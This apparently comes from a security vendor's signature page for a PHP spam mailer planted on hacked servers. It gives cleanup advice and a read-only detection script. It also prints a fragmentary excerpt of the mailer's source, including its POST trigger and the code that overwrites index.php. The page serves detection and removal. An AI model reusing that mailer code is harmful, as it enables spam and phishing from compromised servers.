Malware Signatures

php.hacktool.mailer-tool4spam.001

Mailers are a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resources to send out tons of spam emails in a short time. Moreover, the headers of such emails don't contain traces of the hackers (they lead to the hacked server),
so the whole spam campaign remains quite anonymous. Hacked servers are not a scarce resource, and spammers don't care much if one of them gets blacklisted for spamming: they can easily move to another server. However, to minimize the risk of
blacklisting, they usually distribute mailing evenly between several hacked servers.
tool4spam is a provider of scripts for spamming and hacking. Specifically, they have an M-9AWED Mailer generator script that prepares a custom mailer script and an auxiliary file to send a specific email to a list of recipients.
Such a script can be used by spammers and phishers.

Affecting

Any servers with enabled PHP

Cleanup

You should find this script and all the auxiliary files, which usually have names in the form <attacker's-ip-address>.php, <attacker's-ip-address>.txt and 127.0.0.2.txt. They can be found next to it. Sometimes hackers also create the "Send" subdirectory.
You should delete all these files and subdirectories. Scan your server for other types of malware and specifically for backdoors. Make sure to identify and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam and phishing blacklist providers as a result of hacker activity.
You can sign up with us and let our team remove the malware for you.
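
A read-only sweep for the artifacts listed above, as an added example that is not part of the original signature page: it reports files named after an IPv4 address, the 127.0.0.2.txt auxiliary file, a "Send" directory beside them, and PHP files containing strings visible in the dump below. The function names and the 1 MiB read limit are assumptions of this example.

```python
import ipaddress
import os
import sys

# Strings taken from the dump on this page; any one of them is a strong hint.
CONTENT_MARKERS = (b"tool4spam.com", b"SenderBigCave", b"Sp4m3r Fb3")
MARKER_FILE = "127.0.0.2.txt"

def is_ip_named(filename):
    """True for names of the form <IPv4 address>.php or <IPv4 address>.txt."""
    stem, ext = os.path.splitext(filename)
    if ext.lower() not in (".php", ".txt"):
        return False
    try:
        ipaddress.IPv4Address(stem)
        return True
    except ValueError:
        return False

def scan(webroot):
    """Return sorted (path, reason) findings; nothing is modified or deleted."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        has_marker = MARKER_FILE in filenames
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == MARKER_FILE:
                findings.append((path, "auxiliary file 127.0.0.2.txt"))
            elif is_ip_named(name):
                findings.append((path, "IP-address-named file"))
            if name.lower().endswith(".php"):
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(1 << 20)  # assumption: 1 MiB is enough
                except OSError:
                    continue  # unreadable file: skip it, keep scanning
                hits = [m.decode() for m in CONTENT_MARKERS if m in head]
                if hits:
                    findings.append((path, "content marker: " + ", ".join(hits)))
        # "Send" alone is a common name, so flag it only beside other evidence.
        if "Send" in dirnames and (has_marker or any(is_ip_named(n) for n in filenames)):
            findings.append((os.path.join(dirpath, "Send"), "Send directory next to mailer files"))
    return sorted(findings)

if __name__ == "__main__":
    for path, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}\t{reason}")
```

Review each reported path before deleting anything, and note the directory it was found in, since that is where to start looking for the entry point.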

Dump

... excerpts ...
...
/**************** This tool is made by http://tool4spam.com  ********************/
/****************     visit us for more spam and hack tools    ********************/
$ip = getenv("REMOTE_ADDR");
$ipconf = '.t';
$ipsmart = 'xt';
$type = $ipconf.$ipsmart;
if ($_POST['SenderBigCave']=='<--- Sp4m3r Fb3 --->'){
header('location:'.$ip.'.php');
$aftersend = '';
$localhost = '127.0.0.2';
$endtype = $aftersend.$localhost.$type;
$endtype1 = file_get_contents($endtype);
$file= fopen("".$ip.".php", "w+");
fwrite($file, "");
fclose($file);
...
$file= fopen("".$ip.".txt", "w+");
fwrite($file, $letter);
fclose($file);
$sendername = $_POST['SenderName'];
$subject = $_POST['Subject'];
echo $sendername."
".$sendermail."
".$letter."
".$to."
".$ip;
$to = $_POST['Mailist'];
$file= fopen("".$ip.".php", "a");
fwrite($file, " ");
fwrite($file, ' ...
header('location:'.$ip.'.php');
}else{
if(!file_exists("Send")){
mkdir("Send", 0777);
}
$index = fopen("index.php", "w+");
fwrite ($index, '
Created By Sp4m3r Fb3
CoNtAcT : Sil-x@w.cN
');
fclose($index);
$txt = fopen("127.0.0.2.txt", "w+");
...

...